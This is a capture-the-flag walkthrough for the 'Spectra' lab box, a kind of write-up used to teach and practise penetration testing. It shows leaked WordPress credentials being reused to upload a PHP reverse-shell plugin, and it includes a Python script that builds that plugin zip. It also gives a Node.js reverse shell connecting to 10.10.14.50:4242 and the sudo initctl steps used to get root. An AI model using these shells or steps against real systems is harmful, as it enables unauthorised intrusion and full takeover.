Spectra

I was not a fan of this box. The initial foothold was kind of alright, but the user part was very CTF-like and I don't think stuff like that would exist in any real production environment. But the root part had some NodeJS exploit stuff, so that was kind of new, at least for me! Let's get started.

Port 80 is open and there seem to be two sites:

spec-frontpage

The testing site contains something juicy right off the bat: directory listing is enabled on the root of the page, and among the files is a wp-config.php.save backup. Because the .save extension is not handled by PHP, the server hands out its raw source, which contains database credentials.

spectra-wp-config-save

The box also has 3306 open (usually the MySQL port), but remote logins are disabled, so we can't use the credentials from our side. The next step is to check the main site.

spectra-main

There's nothing too interesting at first glance; it seems to be a typical WordPress site with the default theme, BUT there is at least one valid user who has published a post. Trying to log in as administrator with the password we found earlier in wp-config gets us into the WP admin panel: the database password was reused for the WordPress account.

From the WordPress admin panel you can upload plugins and edit theme files on the server, and either one gives code execution as the web server user. The next step is to upload a PHP reverse shell as a plugin (I used the one from pentestmonkey with some slight modifications). WordPress only recognises a file as a plugin if it starts with a plugin header comment, so prepend the file with the following:

/**
* Plugin Name: MONKEY
* Plugin URI: https://github.com/this/doesnotexist
* Description: Wordpress Monkey plugin
* Version: 1.0
* Author: bolazoo
* Author URI: https://example.com
* License: https://nolicenceforthis
*/

The IP address and port also need to be changed to match your listener. The plugin needs to be zipped, which can be done with the following command:

zip -r monkey.zip monkey.php

Now all that's left is to upload monkey.zip as a new plugin, set up a netcat listener and navigate to http://spectra.htb/main/wp-content/plugins/monkey/monkey.php. The plugin does not even need to be activated: requesting the file directly is enough to run it. Foothold complete!
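To avoid hand-editing the header, address and zip layout every time, here is an added Python helper (my own example, not code from the original post or from pentestmonkey) that renders a minimal plugin with the required header and a classic fsockopen + proc_open PHP reverse shell, then packs it under monkey/monkey.php so WordPress installs it to wp-content/plugins/monkey/. The listener address 10.10.14.50:4242 and the plugin name are placeholders matching the post; the plugin header fields are the same ones shown above.

```python
import io
import zipfile

# Added example (not the author's code): build a WordPress plugin zip whose
# single PHP file opens a reverse shell when it is requested directly.
# __LHOST__/__LPORT__ are placeholders filled in by render_plugin().
PLUGIN_TEMPLATE = """<?php
/**
 * Plugin Name: MONKEY
 * Plugin URI: https://github.com/this/doesnotexist
 * Description: Wordpress Monkey plugin
 * Version: 1.0
 * Author: bolazoo
 */
// fsockopen + proc_open reverse shell: stdin/stdout/stderr of /bin/sh are
// wired straight to the socket, so no pipe pumping loop is needed.
$sock = fsockopen("__LHOST__", __LPORT__);
if ($sock) {
    $proc = proc_open("/bin/sh -i", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
    proc_close($proc);
}
"""


def render_plugin(lhost, lport):
    """Fill the listener address into the template and sanity-check the header."""
    lport = int(lport)
    if not 1 <= lport <= 65535:
        raise ValueError("lport out of range")
    src = PLUGIN_TEMPLATE.replace("__LHOST__", lhost).replace("__LPORT__", str(lport))
    # WordPress only lists a plugin if the header comment carries "Plugin Name:".
    if "Plugin Name:" not in src.split("*/", 1)[0]:
        raise ValueError("missing plugin header")
    return src


def build_plugin_zip(lhost, lport, name="monkey"):
    """Return zip bytes with the plugin at <name>/<name>.php: the uploader keeps
    the top-level directory, so the file lands in wp-content/plugins/<name>/."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{name}/{name}.php", render_plugin(lhost, lport))
    return buf.getvalue()


def zip_entries(zip_bytes):
    """Map of entry name -> decoded source, to verify what was built."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {n: zf.read(n).decode() for n in zf.namelist()}


def trigger_url(base_url, name="monkey"):
    """URL that executes the shell once the plugin is installed (activation is
    not needed, the PHP file runs as soon as it is fetched)."""
    return f"{base_url.rstrip('/')}/wp-content/plugins/{name}/{name}.php"


if __name__ == "__main__":
    data = build_plugin_zip("10.10.14.50", 4242)
    with open("monkey.zip", "wb") as fh:
        fh.write(data)
    print("wrote monkey.zip; listen with: nc -lvnp 4242")
    print("then fetch:", trigger_url("http://spectra.htb/main"))
```

Run it, upload the resulting monkey.zip through Plugins > Add New > Upload Plugin, start the listener, and fetch the printed URL.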

The box contains a lot of data and finding the right thing took some time. /opt/autologin.conf.orig is a script that sets passwords from files, one of them being /etc/autologin/passwd, which contains the password "SummerHereWeCome!!". There are a few users on the box; the password matches the user katie.

Katie is part of the "developers" group, which is the group owner of these files on the system:

/srv/nodetest.js
/etc/init/test.conf
/etc/init/test1.conf
/etc/init/test3.conf
/etc/init/test4.conf
/etc/init/test6.conf
/etc/init/test7.conf
/etc/init/test8.conf
/etc/init/test9.conf
/etc/init/test10.conf

Also, katie can run one command with sudo:

katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl
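Those two findings only become a privilege escalation when put together: a script the developers group can write to, referenced by an init job that runs as root, plus the ability to (re)start that job through sudo. The check below is an added Python example written for this post (not the author's code) that generalises the manual search: it pulls the absolute paths out of an Upstart job's exec line or script block and reports the ones the current user can modify. The SAMPLE_CONF is constructed for the example and is not copied from the box; the job file names (test1.conf and so on) map to the names initctl takes.

```python
import os
import re

# Constructed sample Upstart job (not copied from the box): it launches a
# script that, on Spectra, the developers group can write to.
SAMPLE_CONF = """\
description "constructed test job"
start on filesystem or runlevel [2345]
script
    exec /usr/local/bin/node /srv/nodetest.js
end script
"""

# Absolute path tokens; the lookbehind avoids re-matching inside a path.
_PATH = re.compile(r"(?<![\w/])(/[\w./-]+)")


def referenced_paths(conf_text):
    """Absolute paths on exec lines or inside a script ... end script block."""
    paths, in_script = [], False
    for raw in conf_text.splitlines():
        line = raw.strip()
        if line == "script":
            in_script = True
            continue
        if line == "end script":
            in_script = False
            continue
        if in_script or line.startswith("exec "):
            for p in _PATH.findall(line):
                if p not in paths:
                    paths.append(p)
    return paths


def writable_targets(conf_text, is_writable=lambda p: os.access(p, os.W_OK)):
    """Paths the job runs that the current user can modify. Upstart jobs run
    as root unless the job says otherwise, so any hit is root code execution
    for whoever can start or restart the job."""
    return [p for p in referenced_paths(conf_text) if is_writable(p)]


def audit_init_dir(init_dir="/etc/init"):
    """Walk the real job files and return (job name, writable path) pairs.
    The job name initctl expects is the file name without .conf."""
    hits = []
    if not os.path.isdir(init_dir):
        return hits
    for fn in sorted(os.listdir(init_dir)):
        if not fn.endswith(".conf"):
            continue
        with open(os.path.join(init_dir, fn)) as fh:
            for p in writable_targets(fh.read()):
                hits.append((fn[:-len(".conf")], p))
    return hits


if __name__ == "__main__":
    for job, path in audit_init_dir():
        print(f"sudo /sbin/initctl restart {job}   # runs writable {path} as root")
```

On the box this points straight at nodetest.js and lists every testX job that would execute it; on a clean system it should print nothing.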

Those conf files all contain the same thing: an Upstart job that starts /srv/nodetest.js, and Upstart jobs run as root. Since nodetest.js is writable by the developers group and katie can start any job through sudo initctl, the last step is to replace the contents of nodetest.js with a reverse shell and start one of the jobs. The shell code is:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    // Connect back to the listener and wire the shell's stdio to the socket
    client.connect(4242, "10.10.14.50", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Now all that's left is to set up an nc listener and run the node script via initctl:

sudo /sbin/initctl start test1

And the box is done! Note: if you are not on a private instance, you may need to stop the job first (initctl start fails for a job that is already running, so use initctl stop and then start, or initctl restart), or just try another of the "testX" jobs.